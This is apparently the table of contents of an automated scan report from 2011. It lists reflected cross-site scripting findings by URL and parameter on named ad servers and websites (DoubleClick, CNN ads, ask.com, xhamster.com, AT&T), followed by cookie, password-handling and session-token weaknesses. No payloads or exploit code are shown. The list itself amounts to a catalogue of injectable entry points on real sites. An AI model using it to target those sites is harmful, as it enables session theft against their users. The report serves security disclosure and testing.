XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 08152011-01

Report generated by XSS.CX at Mon Aug 15 13:25:29 GMT-06:00 2011.

1. Cross-site scripting (reflected)

1.1. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]

1.2. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]

1.3. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]

1.4. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]

1.5. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]

1.6. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]

1.7. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]

1.8. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]

1.9. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]

1.10. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]

1.11. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]

1.12. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]

1.13. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.14. http://ad.turn.com/server/pixel.htm [sp parameter]

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [AdID parameter]

1.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [FlightID parameter]

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Redirect parameter]

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Segments parameter]

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [TargetID parameter]

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Values parameter]

1.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [click parameter]

1.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [name of an arbitrarily supplied request parameter]

1.23. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

1.24. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.25. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

1.26. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.27. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.28. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [REST URL parameter 3]

1.29. http://banners.bookofsex.com/go/page/iframe_cm_26400 [REST URL parameter 3]

1.30. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]

1.31. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]

1.32. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]

1.33. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]

1.34. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]

1.35. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]

1.36. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]

1.37. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]

1.38. http://choices.truste.com/ca [c parameter]

1.39. http://choices.truste.com/ca [cid parameter]

1.40. http://choices.truste.com/ca [iplc parameter]

1.41. http://choices.truste.com/ca [plc parameter]

1.42. http://choices.truste.com/ca [zi parameter]

1.43. http://count36.51yes.com/click.aspx [id parameter]

1.44. http://count36.51yes.com/click.aspx [logo parameter]

1.45. http://js.revsci.net/gateway/gw.js [csid parameter]

1.46. http://newspulse.cnn.com/widget/json/social [callback parameter]

1.47. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

1.48. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

1.49. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

1.50. http://syndication.exoclick.com/ads-iframe-display.php [bgcolor parameter]

1.51. http://syndication.exoclick.com/ads-iframe-display.php [font parameter]

1.52. http://v2.tudou.com/tdct/commonadv.html [jsoncallback parameter]

1.53. http://www.ask.com/news [q parameter]

1.54. http://www.ask.com/news [q parameter]

1.55. http://www.ask.com/pictures [q parameter]

1.56. http://www.ask.com/pictures [q parameter]

1.57. http://www.linkedin.com/countserv/count/share [url parameter]

1.58. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp [source parameter]

1.59. http://xhamster.com/signup.php [city parameter]

1.60. http://xhamster.com/signup.php [email parameter]

1.61. http://xhamster.com/signup.php [name of an arbitrarily supplied request parameter]

1.62. http://xhamster.com/signup.php [next parameter]

1.63. http://xhamster.com/signup.php [next parameter]

1.64. http://xhamster.com/signup.php [next parameter]

1.65. http://xhamster.com/signup.php [prev parameter]

1.66. http://xhamster.com/signup.php [username parameter]

1.67. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.68. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [Referer HTTP header]

1.69. http://banners.bookofsex.com/go/page/iframe_cm_26400 [Referer HTTP header]

1.70. http://pop6.com/p/memsearch.cgi [Referer HTTP header]

1.71. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525 [NGUserID cookie]

1.72. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492 [NGUserID cookie]

1.73. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790 [NGUserID cookie]

1.74. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 [NGUserID cookie]

1.75. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756 [NGUserID cookie]

1.76. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756 [NGUserID cookie]

1.77. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 [NGUserID cookie]

1.78. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 [NGUserID cookie]

1.79. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773 [NGUserID cookie]

1.80. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339 [NGUserID cookie]

1.81. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 [NGUserID cookie]

1.82. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 [NGUserID cookie]

1.83. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255 [NGUserID cookie]

1.84. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796 [NGUserID cookie]

1.85. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470 [NGUserID cookie]

1.86. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

1.87. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

1.88. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

1.89. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962 [NGUserID cookie]

1.90. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845 [NGUserID cookie]

1.91. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777 [NGUserID cookie]

1.92. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541 [NGUserID cookie]

1.93. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.94. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.95. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.96. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066 [NGUserID cookie]

1.97. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 [NGUserID cookie]

1.98. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857 [NGUserID cookie]

1.99. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 [NGUserID cookie]

1.100. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 [NGUserID cookie]

1.101. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053 [NGUserID cookie]

1.102. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472 [NGUserID cookie]

1.103. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898 [NGUserID cookie]

1.104. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939 [NGUserID cookie]

1.105. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248 [NGUserID cookie]

1.106. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067 [NGUserID cookie]

1.107. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091 [NGUserID cookie]

1.108. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981 [NGUserID cookie]

1.109. http://www.ask.com/about/help [cu.wz cookie]

1.110. http://www.ask.com/about/help/webmasters [cu.wz cookie]

1.111. http://www.ask.com/about/legal/ask-site-policies [cu.wz cookie]

1.112. http://www.ask.com/about/legal/privacy [cu.wz cookie]

1.113. http://www.ask.com/news [cu.wz cookie]

1.114. http://www.ask.com/news [cu.wz cookie]

1.115. http://www.ask.com/pictures [cu.wz cookie]

1.116. http://www.ask.com/pictures [cu.wz cookie]

1.117. http://www.ask.com/products/display [cu.wz cookie]

1.118. http://www.ask.com/settings [cu.wz cookie]

1.119. http://www.ask.com/settings [cu.wz cookie]

1.120. http://www.ask.com/web [cu.wz cookie]

1.121. http://www.ask.com/web [cu.wz cookie]

1.122. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp [B2CSESSIONID cookie]

2. Flash cross-domain policy

2.1. http://at-img2.tdimg.com/crossdomain.xml

2.2. http://at-img3.tdimg.com/crossdomain.xml

2.3. http://at-img4.tdimg.com/crossdomain.xml

2.4. http://stat.tudou.com/crossdomain.xml

2.5. http://www.xhamstercams.com/crossdomain.xml

2.6. http://xhamster.com/crossdomain.xml

3. Cleartext submission of password

3.1. http://js.mail.sohu.com/passport/pi18030.201011300952.js

3.2. http://www.ask.com/settings

3.3. http://www.mediafire.com/

3.4. http://www.mediafire.com/

3.5. http://www.mediafire.com/

3.6. http://www.mediafire.com/

3.7. http://www.mediafire.com/

3.8. http://www.mediafire.com/

3.9. http://www.tudou.com/

3.10. http://www.xhamstercams.com/cam/Juicy_Jules19/

3.11. http://xhamster.com/

3.12. http://xhamster.com/login.php

3.13. http://xhamster.com/signup.php

3.14. http://xhamster.com/signup.php

4. XML injection

5. Session token in URL

5.1. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

5.2. http://banners.bookofsex.com/go/page/iframe_cm_26400

5.3. http://glean.pop6.com/images/common/glean.gif

5.4. http://l.sharethis.com/pview

5.5. http://pop6.com/p/memsearch.cgi

5.6. http://sales.liveperson.net/hc/76226072/

5.7. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

5.8. http://www.facebook.com/extern/login_status.php

5.9. http://www.google.com/recaptcha/api/challenge

5.10. https://www.redhat.com/wapps/ugc/register.html

5.11. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

5.12. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

5.13. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

6. Password field submitted using GET method

6.1. http://www.ask.com/settings

6.2. http://xhamster.com/

7. Open redirection

8. Cookie without HttpOnly flag set

8.1. http://afe.specificclick.net/

8.2. http://afe.specificclick.net/serve/v=5

8.3. https://www.redhat.com/wapps/sso/login.html

8.4. https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm

8.5. https://www.redhat.com/wapps/store/protected/purchase.html

8.6. http://a.tribalfusion.com/j.ad

8.7. http://a2.mediagra.com/b.php

8.8. http://a5.mediagra.com/b.php

8.9. http://ad.turn.com/server/pixel.htm

8.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

8.11. http://ad.yieldmanager.com/pixel

8.12. http://ads.cnn.com/js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336

8.13. http://ak1.abmr.net/is/www.att.com

8.14. http://ak1.abmr.net/is/www.wireless.att.com

8.15. http://akamai.mathtag.com/sync/img

8.16. http://api.bizographics.com/v1/profile.json

8.17. http://ar.voicefive.com/b/recruitBeacon.pli

8.18. http://b.scorecardresearch.com/b

8.19. http://b.scorecardresearch.com/p

8.20. http://b.scorecardresearch.com/r

8.21. http://b.voicefive.com/p

8.22. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

8.23. http://banners.bookofsex.com/go/page/iframe_cm_26400

8.24. http://bpx.a9.com/ads/getad

8.25. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js

8.26. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js

8.27. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

8.28. http://d7.zedo.com/img/bh.gif

8.29. http://g.ca.bid.invitemedia.com/pubm_imp

8.30. http://gdyn.cnn.com/1.1/1.gif

8.31. http://hire.jobvite.com/CompanyJobs/Careers.aspx

8.32. http://hire.jobvite.com/CompanyJobs/careers_1.css

8.33. http://hire.jobvite.com/CompanyJobs/careers_8.js

8.34. http://i.w55c.net/ping_match.gif

8.35. http://idpix.media6degrees.com/orbserv/hbpix

8.36. http://image2.pubmatic.com/AdServer/Pug

8.37. http://image2.pubmatic.com/AdServer/Pug

8.38. http://js.revsci.net/gateway/gw.js

8.39. http://markets.money.cnn.com/services/api/quotehover/

8.40. http://medleyads.com/mad_history

8.41. http://medleyads.com/spot_history

8.42. http://phoenix.untd.com/TRCK/RGST

8.43. http://ping.crowdscience.com/ping.js

8.44. http://pix04.revsci.net/A09801/b3/0/3/1008211/65654042.js

8.45. http://pix04.revsci.net/D08734/a1/0/0/0.gif

8.46. http://pix04.revsci.net/H07710/b3/0/3/1008211/160487930.js

8.47. http://pix04.revsci.net/H07710/b3/0/3/1008211/784372322.js

8.48. http://pix04.revsci.net/H07710/b3/0/3/1008211/886893878.js

8.49. http://pixel.rubiconproject.com/tap.php

8.50. http://pop6.com/p/memsearch.cgi

8.51. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

8.52. http://r1-ads.ace.advertising.com/site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

8.53. http://sales.liveperson.net/hc/76226072/

8.54. http://sales.liveperson.net/hc/76226072/

8.55. http://segment-pixel.invitemedia.com/set_partner_uid

8.56. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.57. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.58. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.60. http://streamate.doublepimp.com/r.poptracking

8.61. http://sync.mathtag.com/sync/img

8.62. http://t.mookie1.com/t/v1/imp

8.63. http://tags.bluekai.com/site/2736

8.64. http://tags.bluekai.com/site/2751

8.65. http://txt.go.sohu.com/ip/soip

8.66. http://user.lucidmedia.com/clicksense/user

8.67. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

8.68. http://www.ask.com/about/help

8.69. http://www.ask.com/about/help/webmasters

8.70. http://www.ask.com/about/legal/ask-site-policies

8.71. http://www.ask.com/about/legal/privacy

8.72. http://www.ask.com/news

8.73. http://www.ask.com/pictures

8.74. http://www.ask.com/products/display

8.75. http://www.ask.com/settings

8.76. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_helpcenter

8.77. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_webmaster

8.78. http://www.ask.com/staticcontent/about/legal/about_legal_notices

8.79. http://www.ask.com/web

8.80. http://www.att.com/global/images/priceLine_bg.gif

8.81. http://www.att.com/homepage/sitemap/

8.82. http://www.bizographics.com/collect/

8.83. http://www.cnn.com/

8.84. http://www.cnn.com/.element/img/3.0/1px.gif

8.85. http://www.cnn.com/.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html

8.86. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html

8.87. http://www.cnn.com/.element/ssi/www/breaking_news/3.0/banner.html

8.88. http://www.cnn.com/cnn_adspaces/3.0/homepage/main/bot1.120x90.ad

8.89. http://www.cnn.com/cnn_adspaces/3.0/homepage/spon2.126x31.ad

8.90. http://www.cnn.com/favicon.ie9.ico

8.91. http://www.cnn.com/tools/search/cnncom.xml

8.92. http://www.facebook.com/ConanTheBarbarian

8.93. http://www.facebook.com/home.php

8.94. http://www.facebook.com/login.php

8.95. http://www.facebook.com/media/set/

8.96. http://www.flickr.com/flanal_event.gne

8.97. http://www.imdb.com/

8.98. http://www.imdb.com/tv/widget/grid

8.99. http://www.wireless.att.com//store_maintenance/images/att_logo.gif

8.100. http://www.wireless.att.com//store_maintenance/images/globemaintenance.gif

8.101. http://www.wireless.att.com//store_maintenance/images/page_midSlice.gif

8.102. http://www.wireless.att.com//store_maintenance/images/page_topSlice.gif

8.103. http://www.wireless.att.com/cell-phone-service/legal/return-policy.jsp

8.104. http://www.wireless.att.com/cell-phone-service/packages/N

8.105. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

8.106. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

8.107. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

8.108. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

8.109. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif

8.110. http://www.wireless.att.com/store_maintenance/images/page_btmSlice.gif

8.111. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif

8.112. http://www.xhamstercams.com/cam/Juicy_Jules19/

8.113. http://wzus1.ask.com/i/i.gif

9. Password field with autocomplete enabled

9.1. http://pop6.com/p/memsearch.cgi

9.2. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

9.3. http://www.ask.com/settings

9.4. http://www.facebook.com/ConanTheBarbarian

9.5. http://www.facebook.com/login.php

9.6. http://www.facebook.com/media/set/

9.7. http://www.mediafire.com/

9.8. http://www.mediafire.com/

9.9. http://www.mediafire.com/

9.10. http://www.mediafire.com/

9.11. http://www.mediafire.com/

9.12. https://www.redhat.com/wapps/sso/login.html

9.13. https://www.redhat.com/wapps/ugc/register.html

9.14. http://www.tudou.com/

9.15. http://www.xhamstercams.com/cam/Juicy_Jules19/

9.16. http://xhamster.com/

9.17. http://xhamster.com/login.php

9.18. http://xhamster.com/signup.php

9.19. http://xhamster.com/signup.php

9.20. http://xhamster.com/signup.php

9.21. http://xhamster.com/signup.php

10. Source code disclosure

10.1. http://content.pop6.com/banners/aff/35057/120x160/120x160_Dayss.flv

10.2. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_Masami.flv

10.3. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_marry.flv

10.4. http://js.tudouui.com/js/fn/saleloader_71.js

10.5. http://js.tudouui.com/js/fn/tuidefer_32.js

10.6. http://js.tudouui.com/js/lib/tuilib_83.js

10.7. http://js.tudouui.com/js/page/index/v2/userInfo_11.js

10.8. http://platform.linkedin.com/js/nonSecureAnonymousFramework

10.9. http://www.tudou.com/

10.10. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

11. Cross-domain POST

11.1. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm

11.2. http://pop6.com/p/memsearch.cgi

12. Cookie scoped to parent domain

12.1. http://a.tribalfusion.com/j.ad

12.2. http://ad.turn.com/server/pixel.htm

12.3. http://ak1.abmr.net/is/www.att.com

12.4. http://ak1.abmr.net/is/www.wireless.att.com

12.5. http://akamai.mathtag.com/sync/img

12.6. http://api.bizographics.com/v1/profile.json

12.7. http://ar.voicefive.com/b/recruitBeacon.pli

12.8. http://b.scorecardresearch.com/b

12.9. http://b.scorecardresearch.com/p

12.10. http://b.scorecardresearch.com/r

12.11. http://b.voicefive.com/p

12.12. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

12.13. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js

12.14. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js

12.15. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

12.16. http://d7.zedo.com/img/bh.gif

12.17. http://g.ca.bid.invitemedia.com/pubm_imp

12.18. http://gdyn.cnn.com/1.1/1.gif

12.19. http://i.w55c.net/ping_match.gif

12.20. http://ib.adnxs.com/getuidnb

12.21. http://ib.adnxs.com/seg

12.22. http://idpix.media6degrees.com/orbserv/hbpix

12.23. http://image2.pubmatic.com/AdServer/Pug

12.24. http://image2.pubmatic.com/AdServer/Pug

12.25. http://js.revsci.net/gateway/gw.js

12.26. http://phoenix.untd.com/TRCK/RGST

12.27. http://ping.crowdscience.com/ping.js

12.28. http://pix04.revsci.net/A09801/b3/0/3/1008211/65654042.js

12.29. http://pix04.revsci.net/D08734/a1/0/0/0.gif

12.30. http://pix04.revsci.net/H07710/b3/0/3/1008211/160487930.js

12.31. http://pix04.revsci.net/H07710/b3/0/3/1008211/784372322.js

12.32. http://pix04.revsci.net/H07710/b3/0/3/1008211/886893878.js

12.33. http://pixel.rubiconproject.com/tap.php

12.34. http://pt-br.facebook.com/ajax/captcha/recaptcha_log_actions.php

12.35. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

